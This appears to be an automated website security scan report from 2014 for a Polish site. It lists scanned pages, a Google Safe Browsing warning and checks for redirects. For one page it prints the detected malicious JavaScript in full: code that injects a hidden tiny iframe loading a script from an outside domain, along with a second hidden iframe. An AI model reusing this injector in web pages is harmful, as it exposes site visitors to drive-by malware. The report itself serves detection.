Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ezhtml.bydnet.com.pl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ezhtml.bydnet.com.pl/ | 200 OK Content-Length: 1398 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/autorafmar/ | 200 OK Content-Length: 2774 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/autorafmar/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://ezhtml.bydnet.com.pl/test404page.js | 404 Not Found Content-Length: 185 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bktaekwondo/ | 200 OK Content-Length: 490 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bktaekwondo/function.require-once | 404 Not Found Content-Length: 204 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bktaekwondo/function.require | 404 Not Found Content-Length: 199 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/bplan/ | 403 Forbidden Content-Length: 171 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/djantarski/ | 403 Forbidden Content-Length: 171 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/drogerianina/ | 200 OK Content-Length: 3936 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/erzet/ | 200 OK Content-Length: 3669 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)} Antivirus reports:
Hidden iFrame found. size: 10x10 style: hidden src: http://bydnet.home.pl/counter.php <iframe src="http://bydnet.home.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||
http://ezhtml.bydnet.com.pl/erzet/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/javascript | clean |
http://ezhtml.bydnet.com.pl/mattsound/ | 200 OK Content-Length: 12957 Content-Type: text/html | clean |
http://ezhtml.bydnet.com.pl/mattsound/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://ezhtml.bydnet.com.pl/mattsound/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ezhtml.bydnet.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 12:40:31 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
GET / HTTP/1.1
Host: ezhtml.bydnet.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 12:40:31 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: ezhtml.bydnet.com.pl
Referer: http://www.google.com/search?q=ezhtml.bydnet.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ezhtml.bydnet.com.pl
Referer: http://www.google.com/search?q=ezhtml.bydnet.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.